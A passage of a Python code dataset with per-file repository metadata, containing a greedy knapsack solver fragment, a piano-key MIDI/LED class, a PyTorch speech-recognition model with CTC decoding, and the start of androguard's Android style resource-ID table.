                                                                                self.forceUseLimits,
                                                                                self.iterCounter)
                    attemptTimeS = round(time.perf_counter() - t1, 4)
                    if maxN < optN:
                        maxN = optN
                        maxDimN = optDimN
                        maxNValues = optValuesN
                        maxNItems = optItemsN
                        if self.printGreedyInfo and optimizeIterIndex == 0:
                            estimatedMaxTime = estimatedAttemptsCount * Decimal(attemptTimeS)
                            print(
                                f"The NON exact {size}D greedyTopDown knapsack solver: estimated max time {estimatedMaxTime}.")
                        if self.printGreedyInfo:
                            print(
                                f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex}, some max value {maxN} has been found, time {attemptTimeS}, total time {round(time.perf_counter() - t0, 4)}, total iters {round(self.iterCounter[0])}.")
                    elif self.printGreedyInfo and attemptTimeS > 2:
                        print(
                            f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex}, delta max {maxN - optN}, time {attemptTimeS}, total time {round(time.perf_counter() - t0, 4)}, total iters {round(self.iterCounter[0])}")
                    prevOptimizedIndexes.add(optTuple)
                elif self.printGreedyInfo:
                    print(
                        f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex} was skipped due to less values. Exiting.")
                    break
            elif self.printGreedyInfo:
                print(f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex} was skipped.")
            # Step one dimension's limit down a stair (round-robin), then check
            # whether any dimension can still step further.
            decIndex = (optimizeIterIndex) % size
            if dimStairDownCursors[decIndex] >= dimStairSteps[decIndex]:
                dimStairDownCursors[decIndex] -= dimStairSteps[decIndex]
            for dimensionIndex in range(size):
                anyGreaterThanStep = dimStairDownCursors[dimensionIndex] >= dimStairSteps[dimensionIndex]
                if anyGreaterThanStep:
                    break
            optimizeIterIndex += 1
        # The source line for this return was fused with dataset metadata
        # ("| 9,433 | 8 | 212 |"); restored to the bare return statement.
        return maxN, maxDimN, maxNItems, maxNValues
ed13bd0aa077e3581aab8400854ef77def5fdd81 | 1,297 | py | Python | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | from mido import Message
from settings import MIDI_MSG_NOTE_OFFSET
from utility.state import KeyState
| 27.595745 | 63 | 0.583655 | from mido import Message
from settings import MIDI_MSG_NOTE_OFFSET
from utility.state import KeyState
class Key:
    """One piano key: its MIDI number, LED strip position, pitch and press state."""

    def __init__(self, index, note):
        self.index = index
        self.midi_index = index + MIDI_MSG_NOTE_OFFSET
        self.note = note
        self.led_index = self.get_led_index()
        self.frequency = self.get_frequency()
        self.state = KeyState.Released
        self.velocity = 0
        self.led = None

    def get_frequency(self):
        """Equal-tempered pitch in Hz, anchored so that key index 48 is 440 Hz."""
        semitones_from_a440 = self.index - 48
        return 440 * 2 ** (semitones_from_a440 / 12)

    def get_led_index(self):
        """Map the key index onto the LED strip: keys sit two LEDs apart,
        shifted by one LED at either end of the keyboard."""
        doubled = self.index * 2
        if self.index < 36:
            return doubled + 1
        if self.index > 71:
            return doubled - 1
        return doubled

    def set_pressed(self, velocity=100):
        """Mark this key as pressed with the given velocity."""
        self.state = KeyState.Pressed
        self.velocity = velocity

    def set_released(self, velocity=0):
        """Mark this key as released."""
        self.state = KeyState.Released
        self.velocity = velocity

    def to_midi_message(self, type):
        """Build a mido note_on/note_off message for this key ('on' -> velocity 127)."""
        midi_velocity = 127 if type == "on" else 0
        return Message(
            "note_{}".format(type),
            note=self.midi_index,
            velocity=midi_velocity,
        )

    def __str__(self):
        return "Note: {} KeyState: {} Velocity: {}".format(
            self.note, self.state, self.velocity
        )
| 994 | -11 | 211 |
9b8ecd42d65fa34b19512883a8983cf4b50cb5cb | 6,962 | py | Python | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | null | null | null | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | 9 | 2021-06-08T22:18:08.000Z | 2022-03-12T00:46:43.000Z | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | 1 | 2020-10-12T17:13:35.000Z | 2020-10-12T17:13:35.000Z | import torch
import torch.nn as nn
import torch.utils.data as data
import torch.optim as optim
import torch.nn.functional as F
import torchaudio
class TextTransform:
    """Maps characters to integers and vice versa"""
    # NOTE(review): this copy of the class carries no __init__; it expects
    # self.char_map / self.index_map to have been populated elsewhere.

    def text_to_int(self, text):
        """Encode a text string as a list of integer labels via self.char_map."""
        # A space is stored in the map under the explicit '<SPACE>' token.
        return [self.char_map['<SPACE>' if c == ' ' else c] for c in text]

    def int_to_text(self, labels):
        """Decode integer labels back into text via self.index_map."""
        decoded = ''.join(self.index_map[i] for i in labels)
        return decoded.replace('<SPACE>', ' ')
text_transform = TextTransform()
class CNNLayerNorm(nn.Module):
    """Layer normalization built for cnns input"""
    # NOTE(review): this copy of the class carries only its docstring -- the
    # __init__/forward bodies are missing here (stripped duplicate); a complete
    # CNNLayerNorm definition appears further down in this file.
class ResidualCNN(nn.Module):
    """Residual CNN inspired by https://arxiv.org/pdf/1603.05027.pdf
    except with layer norm instead of batch norm
    """
    # NOTE(review): this copy of the class carries only its docstring -- the
    # __init__/forward bodies are missing here (stripped duplicate); a complete
    # ResidualCNN definition appears further down in this file.
| 33.471154 | 125 | 0.586326 | import torch
import torch.nn as nn
import torch.utils.data as data
import torch.optim as optim
import torch.nn.functional as F
import torchaudio
class TextTransform:
    """Maps characters to integers and vice versa"""
    def __init__(self):
        char_map_str = """
        ' 0
        <SPACE> 1
        a 2
        b 3
        c 4
        d 5
        e 6
        f 7
        g 8
        h 9
        i 10
        j 11
        k 12
        l 13
        m 14
        n 15
        o 16
        p 17
        q 18
        r 19
        s 20
        t 21
        u 22
        v 23
        w 24
        x 25
        y 26
        z 27
        """
        # Build the forward and reverse maps in one pass over the table above.
        entries = [line.split() for line in char_map_str.strip().split('\n')]
        self.char_map = {symbol: int(label) for symbol, label in entries}
        self.index_map = {int(label): symbol for symbol, label in entries}
        # Decode label 1 as a real space instead of the '<SPACE>' token.
        self.index_map[1] = ' '

    def text_to_int(self, text):
        """Encode a text string as a list of integer labels via self.char_map."""
        return [self.char_map['<SPACE>' if c == ' ' else c] for c in text]

    def int_to_text(self, labels):
        """Decode integer labels back into text via self.index_map."""
        decoded = ''.join(self.index_map[i] for i in labels)
        return decoded.replace('<SPACE>', ' ')
text_transform = TextTransform()
def GreedyDecoder(output, blank_label=28, collapse_repeated=True):
    """Greedy (best-path) CTC decoding.

    Takes per-frame class scores shaped (batch, time, n_class), drops blank
    frames, optionally collapses immediate frame-to-frame repeats, and maps
    the surviving label indexes to text via the module-level `text_transform`.
    """
    best_per_frame = torch.argmax(output, dim=2)
    decodes = []
    for frame_labels in best_per_frame:
        emitted = []
        previous = None
        for label in frame_labels:
            if label != blank_label:
                # Skip only a repeat of the immediately preceding *frame*
                # label; a blank in between re-enables emission.
                if not (collapse_repeated and previous is not None and label == previous):
                    emitted.append(label.item())
            previous = label
        decodes.append(text_transform.int_to_text(emitted))
    return decodes
class CNNLayerNorm(nn.Module):
    """LayerNorm over the feature axis of a (batch, channel, feature, time) tensor."""

    def __init__(self, n_feats):
        super().__init__()
        self.layer_norm = nn.LayerNorm(n_feats)

    def forward(self, x):
        """Normalise `x` along its feature dimension, preserving the layout."""
        # nn.LayerNorm normalises the last axis, so swap feature/time first...
        swapped = x.transpose(2, 3).contiguous()  # (batch, channel, time, feature)
        normed = self.layer_norm(swapped)
        # ...and swap back afterwards.
        return normed.transpose(2, 3).contiguous()  # (batch, channel, feature, time)
class ResidualCNN(nn.Module):
    """Residual CNN inspired by https://arxiv.org/pdf/1603.05027.pdf
    except with layer norm instead of batch norm
    """

    def __init__(self, in_channels, out_channels, kernel, stride, dropout, n_feats):
        super().__init__()
        # Attribute creation order preserved (matters for seeded weight init).
        self.cnn1 = nn.Conv2d(in_channels, out_channels, kernel, stride, padding=kernel//2)
        self.cnn2 = nn.Conv2d(out_channels, out_channels, kernel, stride, padding=kernel//2)
        self.dropout1 = nn.Dropout(dropout)
        self.dropout2 = nn.Dropout(dropout)
        self.layer_norm1 = CNNLayerNorm(n_feats)
        self.layer_norm2 = CNNLayerNorm(n_feats)

    def forward(self, x):
        """Pre-activation residual block: (norm -> GELU -> dropout -> conv) twice, plus skip."""
        shortcut = x  # (batch, channel, feature, time)
        out = self.cnn1(self.dropout1(F.gelu(self.layer_norm1(x))))
        out = self.cnn2(self.dropout2(F.gelu(self.layer_norm2(out))))
        return out + shortcut
class BidirectionalGRU(nn.Module):
    """LayerNorm + GELU followed by one bidirectional GRU layer and dropout."""

    def __init__(self, rnn_dim, hidden_size, dropout, batch_first):
        super().__init__()
        # Attribute creation order preserved (matters for seeded weight init).
        self.BiGRU = nn.GRU(
            input_size=rnn_dim, hidden_size=hidden_size,
            num_layers=1, batch_first=batch_first, bidirectional=True)
        self.layer_norm = nn.LayerNorm(rnn_dim)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        """Normalise, activate, run the GRU, and apply dropout to its outputs."""
        activated = F.gelu(self.layer_norm(x))
        outputs, _hidden = self.BiGRU(activated)
        return self.dropout(outputs)
class SpeechRecognitionModel(nn.Module):
    """CNN + residual-CNN feature extractor feeding stacked bidirectional GRUs
    and a linear classifier head."""

    def __init__(self, n_cnn_layers, n_rnn_layers, rnn_dim, n_class, n_feats, stride=2, dropout=0.1):
        super().__init__()
        n_feats = n_feats//2  # the stride-2 entry conv halves the feature axis
        # Entry conv for extracting hierarchical features.
        self.cnn = nn.Conv2d(1, 32, 3, stride=stride, padding=3//2)
        # n_cnn_layers residual CNN blocks, all with 32 filters.
        self.rescnn_layers = nn.Sequential(*(
            ResidualCNN(32, 32, kernel=3, stride=1, dropout=dropout, n_feats=n_feats)
            for _ in range(n_cnn_layers)
        ))
        self.fully_connected = nn.Linear(n_feats*32, rnn_dim)
        # The first GRU consumes rnn_dim features; later ones consume the
        # 2*rnn_dim bidirectional output of their predecessor.
        self.birnn_layers = nn.Sequential(*(
            BidirectionalGRU(rnn_dim=rnn_dim if i == 0 else rnn_dim*2,
                             hidden_size=rnn_dim, dropout=dropout, batch_first=i == 0)
            for i in range(n_rnn_layers)
        ))
        self.classifier = nn.Sequential(
            nn.Linear(rnn_dim*2, rnn_dim),  # birnn returns rnn_dim*2
            nn.GELU(),
            nn.Dropout(dropout),
            nn.Linear(rnn_dim, n_class)
        )

    def forward(self, x):
        """Map a (batch, 1, feature, time) spectrogram to (batch, time, n_class) scores."""
        features = self.rescnn_layers(self.cnn(x))
        batch, channels, feats, frames = features.size()
        flat = features.view(batch, channels * feats, frames)  # (batch, feature, time)
        sequence = flat.transpose(1, 2)  # (batch, time, feature)
        sequence = self.fully_connected(sequence)
        sequence = self.birnn_layers(sequence)
        return self.classifier(sequence)
def load_audio(audio):
    """Read an audio file and return its mel spectrogram shaped (1, 1, n_mels, time)."""
    waveform, _sample_rate = torchaudio.load(audio)
    mel = torchaudio.transforms.MelSpectrogram()
    spec = mel(waveform).squeeze(0).transpose(0, 1)  # (time, n_mels)
    batched = nn.utils.rnn.pad_sequence(spec.view(1, *spec.shape), batch_first=True)
    return batched.unsqueeze(1).transpose(2, 3)
def load_model(model):
    """Deserialise and return an object previously saved with torch.save."""
    return torch.load(model)
def srtotext(audio, model):
    """Transcribe an audio file using a saved SpeechRecognitionModel.

    Parameters
    ----------
    audio : path to an audio file readable by torchaudio (via load_audio).
    model : path to a state_dict checkpoint produced by ``torch.save``.

    Returns
    -------
    The decoded prediction(s) produced by ``GreedyDecoder``.
    """
    # Hyperparameters must match the checkpoint being loaded.
    hparams = {"n_cnn_layers": 3, "n_rnn_layers": 5, "rnn_dim": 512,
               "n_class": 29, "n_feats": 128, "stride": 2, "dropout": 0.1}
    print('Loading mfcc')
    mfcc = load_audio(audio)
    print('Load Model')
    net = SpeechRecognitionModel(
        hparams['n_cnn_layers'], hparams['n_rnn_layers'], hparams['rnn_dim'],
        hparams['n_class'], hparams['n_feats'], hparams['stride'], hparams['dropout'])
    print('Already Initiate a class')
    # map_location lets a GPU-trained checkpoint load on a CPU-only host,
    # matching the CPU-only inference performed below.
    net.load_state_dict(torch.load(model, map_location='cpu'))
    net.eval()
    with torch.no_grad():
        output = net(mfcc)                         # (batch, time, n_class) logits
        log_probs = F.log_softmax(output, dim=2)
    # The original transposed to (time, batch, n_class) and immediately
    # transposed back before decoding; pass the batch-first tensor directly.
    decoded_preds = GreedyDecoder(log_probs)
    return decoded_preds
2965a0c80b2671a72e657104596c8c9acf7af8ce | 87,018 | py | Python | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | 2 | 2020-12-01T19:13:23.000Z | 2021-03-17T08:54:10.000Z | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | null | null | null | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | null | null | null | resources = {
'style': {
'Animation' : 16973824,
'Animation.Activity' : 16973825,
'Animation.Dialog' : 16973826,
'Animation.InputMethod' : 16973910,
'Animation.Toast' : 16973828,
'Animation.Translucent' : 16973827,
'DeviceDefault.ButtonBar' : 16974287,
'DeviceDefault.ButtonBar.AlertDialog' : 16974288,
'DeviceDefault.Light.ButtonBar' : 16974290,
'DeviceDefault.Light.ButtonBar.AlertDialog' : 16974291,
'DeviceDefault.Light.SegmentedButton' : 16974292,
'DeviceDefault.SegmentedButton' : 16974289,
'Holo.ButtonBar' : 16974053,
'Holo.ButtonBar.AlertDialog' : 16974055,
'Holo.Light.ButtonBar' : 16974054,
'Holo.Light.ButtonBar.AlertDialog' : 16974056,
'Holo.Light.SegmentedButton' : 16974058,
'Holo.SegmentedButton' : 16974057,
'MediaButton' : 16973879,
'MediaButton.Ffwd' : 16973883,
'MediaButton.Next' : 16973881,
'MediaButton.Pause' : 16973885,
'MediaButton.Play' : 16973882,
'MediaButton.Previous' : 16973880,
'MediaButton.Rew' : 16973884,
'TextAppearance' : 16973886,
'TextAppearance.DeviceDefault' : 16974253,
'TextAppearance.DeviceDefault.DialogWindowTitle' : 16974264,
'TextAppearance.DeviceDefault.Inverse' : 16974254,
'TextAppearance.DeviceDefault.Large' : 16974255,
'TextAppearance.DeviceDefault.Large.Inverse' : 16974256,
'TextAppearance.DeviceDefault.Medium' : 16974257,
'TextAppearance.DeviceDefault.Medium.Inverse' : 16974258,
'TextAppearance.DeviceDefault.SearchResult.Subtitle' : 16974262,
'TextAppearance.DeviceDefault.SearchResult.Title' : 16974261,
'TextAppearance.DeviceDefault.Small' : 16974259,
'TextAppearance.DeviceDefault.Small.Inverse' : 16974260,
'TextAppearance.DeviceDefault.Widget' : 16974265,
'TextAppearance.DeviceDefault.Widget.ActionBar.Menu' : 16974286,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle' : 16974279,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle.Inverse' : 16974283,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title' : 16974278,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title.Inverse' : 16974282,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle' : 16974281,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle.Inverse' : 16974285,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title' : 16974280,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title.Inverse' : 16974284,
'TextAppearance.DeviceDefault.Widget.Button' : 16974266,
'TextAppearance.DeviceDefault.Widget.DropDownHint' : 16974271,
'TextAppearance.DeviceDefault.Widget.DropDownItem' : 16974272,
'TextAppearance.DeviceDefault.Widget.EditText' : 16974274,
'TextAppearance.DeviceDefault.Widget.IconMenu.Item' : 16974267,
'TextAppearance.DeviceDefault.Widget.PopupMenu' : 16974275,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Large' : 16974276,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Small' : 16974277,
'TextAppearance.DeviceDefault.Widget.TabWidget' : 16974268,
'TextAppearance.DeviceDefault.Widget.TextView' : 16974269,
'TextAppearance.DeviceDefault.Widget.TextView.PopupMenu' : 16974270,
'TextAppearance.DeviceDefault.Widget.TextView.SpinnerItem' : 16974273,
'TextAppearance.DeviceDefault.WindowTitle' : 16974263,
'TextAppearance.DialogWindowTitle' : 16973889,
'TextAppearance.Holo' : 16974075,
'TextAppearance.Holo.DialogWindowTitle' : 16974103,
'TextAppearance.Holo.Inverse' : 16974076,
'TextAppearance.Holo.Large' : 16974077,
'TextAppearance.Holo.Large.Inverse' : 16974078,
'TextAppearance.Holo.Medium' : 16974079,
'TextAppearance.Holo.Medium.Inverse' : 16974080,
'TextAppearance.Holo.SearchResult.Subtitle' : 16974084,
'TextAppearance.Holo.SearchResult.Title' : 16974083,
'TextAppearance.Holo.Small' : 16974081,
'TextAppearance.Holo.Small.Inverse' : 16974082,
'TextAppearance.Holo.Widget' : 16974085,
'TextAppearance.Holo.Widget.ActionBar.Menu' : 16974112,
'TextAppearance.Holo.Widget.ActionBar.Subtitle' : 16974099,
'TextAppearance.Holo.Widget.ActionBar.Subtitle.Inverse' : 16974109,
'TextAppearance.Holo.Widget.ActionBar.Title' : 16974098,
'TextAppearance.Holo.Widget.ActionBar.Title.Inverse' : 16974108,
'TextAppearance.Holo.Widget.ActionMode.Subtitle' : 16974101,
'TextAppearance.Holo.Widget.ActionMode.Subtitle.Inverse' : 16974111,
'TextAppearance.Holo.Widget.ActionMode.Title' : 16974100,
'TextAppearance.Holo.Widget.ActionMode.Title.Inverse' : 16974110,
'TextAppearance.Holo.Widget.Button' : 16974086,
'TextAppearance.Holo.Widget.DropDownHint' : 16974091,
'TextAppearance.Holo.Widget.DropDownItem' : 16974092,
'TextAppearance.Holo.Widget.EditText' : 16974094,
'TextAppearance.Holo.Widget.IconMenu.Item' : 16974087,
'TextAppearance.Holo.Widget.PopupMenu' : 16974095,
'TextAppearance.Holo.Widget.PopupMenu.Large' : 16974096,
'TextAppearance.Holo.Widget.PopupMenu.Small' : 16974097,
'TextAppearance.Holo.Widget.TabWidget' : 16974088,
'TextAppearance.Holo.Widget.TextView' : 16974089,
'TextAppearance.Holo.Widget.TextView.PopupMenu' : 16974090,
'TextAppearance.Holo.Widget.TextView.SpinnerItem' : 16974093,
'TextAppearance.Holo.WindowTitle' : 16974102,
'TextAppearance.Inverse' : 16973887,
'TextAppearance.Large' : 16973890,
'TextAppearance.Large.Inverse' : 16973891,
'TextAppearance.Material' : 16974317,
'TextAppearance.Material.Body1' : 16974320,
'TextAppearance.Material.Body2' : 16974319,
'TextAppearance.Material.Button' : 16974318,
'TextAppearance.Material.Caption' : 16974321,
'TextAppearance.Material.DialogWindowTitle' : 16974322,
'TextAppearance.Material.Display1' : 16974326,
'TextAppearance.Material.Display2' : 16974325,
'TextAppearance.Material.Display3' : 16974324,
'TextAppearance.Material.Display4' : 16974323,
'TextAppearance.Material.Headline' : 16974327,
'TextAppearance.Material.Inverse' : 16974328,
'TextAppearance.Material.Large' : 16974329,
'TextAppearance.Material.Large.Inverse' : 16974330,
'TextAppearance.Material.Medium' : 16974331,
'TextAppearance.Material.Medium.Inverse' : 16974332,
'TextAppearance.Material.Menu' : 16974333,
'TextAppearance.Material.Notification' : 16974334,
'TextAppearance.Material.Notification.Emphasis' : 16974335,
'TextAppearance.Material.Notification.Info' : 16974336,
'TextAppearance.Material.Notification.Line2' : 16974337,
'TextAppearance.Material.Notification.Time' : 16974338,
'TextAppearance.Material.Notification.Title' : 16974339,
'TextAppearance.Material.SearchResult.Subtitle' : 16974340,
'TextAppearance.Material.SearchResult.Title' : 16974341,
'TextAppearance.Material.Small' : 16974342,
'TextAppearance.Material.Small.Inverse' : 16974343,
'TextAppearance.Material.Subhead' : 16974344,
'TextAppearance.Material.Title' : 16974345,
'TextAppearance.Material.Widget' : 16974347,
'TextAppearance.Material.Widget.ActionBar.Menu' : 16974348,
'TextAppearance.Material.Widget.ActionBar.Subtitle' : 16974349,
'TextAppearance.Material.Widget.ActionBar.Subtitle.Inverse' : 16974350,
'TextAppearance.Material.Widget.ActionBar.Title' : 16974351,
'TextAppearance.Material.Widget.ActionBar.Title.Inverse' : 16974352,
'TextAppearance.Material.Widget.ActionMode.Subtitle' : 16974353,
'TextAppearance.Material.Widget.ActionMode.Subtitle.Inverse' : 16974354,
'TextAppearance.Material.Widget.ActionMode.Title' : 16974355,
'TextAppearance.Material.Widget.ActionMode.Title.Inverse' : 16974356,
'TextAppearance.Material.Widget.Button' : 16974357,
'TextAppearance.Material.Widget.DropDownHint' : 16974358,
'TextAppearance.Material.Widget.DropDownItem' : 16974359,
'TextAppearance.Material.Widget.EditText' : 16974360,
'TextAppearance.Material.Widget.IconMenu.Item' : 16974361,
'TextAppearance.Material.Widget.PopupMenu' : 16974362,
'TextAppearance.Material.Widget.PopupMenu.Large' : 16974363,
'TextAppearance.Material.Widget.PopupMenu.Small' : 16974364,
'TextAppearance.Material.Widget.TabWidget' : 16974365,
'TextAppearance.Material.Widget.TextView' : 16974366,
'TextAppearance.Material.Widget.TextView.PopupMenu' : 16974367,
'TextAppearance.Material.Widget.TextView.SpinnerItem' : 16974368,
'TextAppearance.Material.Widget.Toolbar.Subtitle' : 16974369,
'TextAppearance.Material.Widget.Toolbar.Title' : 16974370,
'TextAppearance.Material.WindowTitle' : 16974346,
'TextAppearance.Medium' : 16973892,
'TextAppearance.Medium.Inverse' : 16973893,
'TextAppearance.Small' : 16973894,
'TextAppearance.Small.Inverse' : 16973895,
'TextAppearance.StatusBar.EventContent' : 16973927,
'TextAppearance.StatusBar.EventContent.Title' : 16973928,
'TextAppearance.StatusBar.Icon' : 16973926,
'TextAppearance.StatusBar.Title' : 16973925,
'TextAppearance.SuggestionHighlight' : 16974104,
'TextAppearance.Theme' : 16973888,
'TextAppearance.Theme.Dialog' : 16973896,
'TextAppearance.Widget' : 16973897,
'TextAppearance.Widget.Button' : 16973898,
'TextAppearance.Widget.DropDownHint' : 16973904,
'TextAppearance.Widget.DropDownItem' : 16973905,
'TextAppearance.Widget.EditText' : 16973900,
'TextAppearance.Widget.IconMenu.Item' : 16973899,
'TextAppearance.Widget.PopupMenu.Large' : 16973952,
'TextAppearance.Widget.PopupMenu.Small' : 16973953,
'TextAppearance.Widget.TabWidget' : 16973901,
'TextAppearance.Widget.TextView' : 16973902,
'TextAppearance.Widget.TextView.PopupMenu' : 16973903,
'TextAppearance.Widget.TextView.SpinnerItem' : 16973906,
'TextAppearance.WindowTitle' : 16973907,
'Theme' : 16973829,
'ThemeOverlay' : 16974407,
'ThemeOverlay.Material' : 16974408,
'ThemeOverlay.Material.ActionBar' : 16974409,
'ThemeOverlay.Material.Dark' : 16974411,
'ThemeOverlay.Material.Dark.ActionBar' : 16974412,
'ThemeOverlay.Material.Light' : 16974410,
'Theme.Black' : 16973832,
'Theme.Black.NoTitleBar' : 16973833,
'Theme.Black.NoTitleBar.Fullscreen' : 16973834,
'Theme.DeviceDefault' : 16974120,
'Theme.DeviceDefault.Dialog' : 16974126,
'Theme.DeviceDefault.DialogWhenLarge' : 16974134,
'Theme.DeviceDefault.DialogWhenLarge.NoActionBar' : 16974135,
'Theme.DeviceDefault.Dialog.MinWidth' : 16974127,
'Theme.DeviceDefault.Dialog.NoActionBar' : 16974128,
'Theme.DeviceDefault.Dialog.NoActionBar.MinWidth' : 16974129,
'Theme.DeviceDefault.InputMethod' : 16974142,
'Theme.DeviceDefault.Light' : 16974123,
'Theme.DeviceDefault.Light.DarkActionBar' : 16974143,
'Theme.DeviceDefault.Light.Dialog' : 16974130,
'Theme.DeviceDefault.Light.DialogWhenLarge' : 16974136,
'Theme.DeviceDefault.Light.DialogWhenLarge.NoActionBar' : 16974137,
'Theme.DeviceDefault.Light.Dialog.MinWidth' : 16974131,
'Theme.DeviceDefault.Light.Dialog.NoActionBar' : 16974132,
'Theme.DeviceDefault.Light.Dialog.NoActionBar.MinWidth' : 16974133,
'Theme.DeviceDefault.Light.NoActionBar' : 16974124,
'Theme.DeviceDefault.Light.NoActionBar.Fullscreen' : 16974125,
'Theme.DeviceDefault.Light.NoActionBar.Overscan' : 16974304,
'Theme.DeviceDefault.Light.NoActionBar.TranslucentDecor' : 16974308,
'Theme.DeviceDefault.Light.Panel' : 16974139,
'Theme.DeviceDefault.NoActionBar' : 16974121,
'Theme.DeviceDefault.NoActionBar.Fullscreen' : 16974122,
'Theme.DeviceDefault.NoActionBar.Overscan' : 16974303,
'Theme.DeviceDefault.NoActionBar.TranslucentDecor' : 16974307,
'Theme.DeviceDefault.Panel' : 16974138,
'Theme.DeviceDefault.Settings' : 16974371,
'Theme.DeviceDefault.Wallpaper' : 16974140,
'Theme.DeviceDefault.Wallpaper.NoTitleBar' : 16974141,
'Theme.Dialog' : 16973835,
'Theme.Holo' : 16973931,
'Theme.Holo.Dialog' : 16973935,
'Theme.Holo.DialogWhenLarge' : 16973943,
'Theme.Holo.DialogWhenLarge.NoActionBar' : 16973944,
'Theme.Holo.Dialog.MinWidth' : 16973936,
'Theme.Holo.Dialog.NoActionBar' : 16973937,
'Theme.Holo.Dialog.NoActionBar.MinWidth' : 16973938,
'Theme.Holo.InputMethod' : 16973951,
'Theme.Holo.Light' : 16973934,
'Theme.Holo.Light.DarkActionBar' : 16974105,
'Theme.Holo.Light.Dialog' : 16973939,
'Theme.Holo.Light.DialogWhenLarge' : 16973945,
'Theme.Holo.Light.DialogWhenLarge.NoActionBar' : 16973946,
'Theme.Holo.Light.Dialog.MinWidth' : 16973940,
'Theme.Holo.Light.Dialog.NoActionBar' : 16973941,
'Theme.Holo.Light.Dialog.NoActionBar.MinWidth' : 16973942,
'Theme.Holo.Light.NoActionBar' : 16974064,
'Theme.Holo.Light.NoActionBar.Fullscreen' : 16974065,
'Theme.Holo.Light.NoActionBar.Overscan' : 16974302,
'Theme.Holo.Light.NoActionBar.TranslucentDecor' : 16974306,
'Theme.Holo.Light.Panel' : 16973948,
'Theme.Holo.NoActionBar' : 16973932,
'Theme.Holo.NoActionBar.Fullscreen' : 16973933,
'Theme.Holo.NoActionBar.Overscan' : 16974301,
'Theme.Holo.NoActionBar.TranslucentDecor' : 16974305,
'Theme.Holo.Panel' : 16973947,
'Theme.Holo.Wallpaper' : 16973949,
'Theme.Holo.Wallpaper.NoTitleBar' : 16973950,
'Theme.InputMethod' : 16973908,
'Theme.Light' : 16973836,
'Theme.Light.NoTitleBar' : 16973837,
'Theme.Light.NoTitleBar.Fullscreen' : 16973838,
'Theme.Light.Panel' : 16973914,
'Theme.Light.WallpaperSettings' : 16973922,
'Theme.Material' : 16974372,
'Theme.Material.Dialog' : 16974373,
'Theme.Material.DialogWhenLarge' : 16974379,
'Theme.Material.DialogWhenLarge.NoActionBar' : 16974380,
'Theme.Material.Dialog.Alert' : 16974374,
'Theme.Material.Dialog.MinWidth' : 16974375,
'Theme.Material.Dialog.NoActionBar' : 16974376,
'Theme.Material.Dialog.NoActionBar.MinWidth' : 16974377,
'Theme.Material.Dialog.Presentation' : 16974378,
'Theme.Material.InputMethod' : 16974381,
'Theme.Material.Light' : 16974391,
'Theme.Material.Light.DarkActionBar' : 16974392,
'Theme.Material.Light.Dialog' : 16974393,
'Theme.Material.Light.DialogWhenLarge' : 16974399,
'Theme.Material.Light.DialogWhenLarge.NoActionBar' : 16974400,
'Theme.Material.Light.Dialog.Alert' : 16974394,
'Theme.Material.Light.Dialog.MinWidth' : 16974395,
'Theme.Material.Light.Dialog.NoActionBar' : 16974396,
'Theme.Material.Light.Dialog.NoActionBar.MinWidth' : 16974397,
'Theme.Material.Light.Dialog.Presentation' : 16974398,
'Theme.Material.Light.NoActionBar' : 16974401,
'Theme.Material.Light.NoActionBar.Fullscreen' : 16974402,
'Theme.Material.Light.NoActionBar.Overscan' : 16974403,
'Theme.Material.Light.NoActionBar.TranslucentDecor' : 16974404,
'Theme.Material.Light.Panel' : 16974405,
'Theme.Material.Light.Voice' : 16974406,
'Theme.Material.NoActionBar' : 16974382,
'Theme.Material.NoActionBar.Fullscreen' : 16974383,
'Theme.Material.NoActionBar.Overscan' : 16974384,
'Theme.Material.NoActionBar.TranslucentDecor' : 16974385,
'Theme.Material.Panel' : 16974386,
'Theme.Material.Settings' : 16974387,
'Theme.Material.Voice' : 16974388,
'Theme.Material.Wallpaper' : 16974389,
'Theme.Material.Wallpaper.NoTitleBar' : 16974390,
'Theme.NoDisplay' : 16973909,
'Theme.NoTitleBar' : 16973830,
'Theme.NoTitleBar.Fullscreen' : 16973831,
'Theme.NoTitleBar.OverlayActionModes' : 16973930,
'Theme.Panel' : 16973913,
'Theme.Translucent' : 16973839,
'Theme.Translucent.NoTitleBar' : 16973840,
'Theme.Translucent.NoTitleBar.Fullscreen' : 16973841,
'Theme.Wallpaper' : 16973918,
'Theme.WallpaperSettings' : 16973921,
'Theme.Wallpaper.NoTitleBar' : 16973919,
'Theme.Wallpaper.NoTitleBar.Fullscreen' : 16973920,
'Theme.WithActionBar' : 16973929,
'Widget' : 16973842,
'Widget.AbsListView' : 16973843,
'Widget.ActionBar' : 16973954,
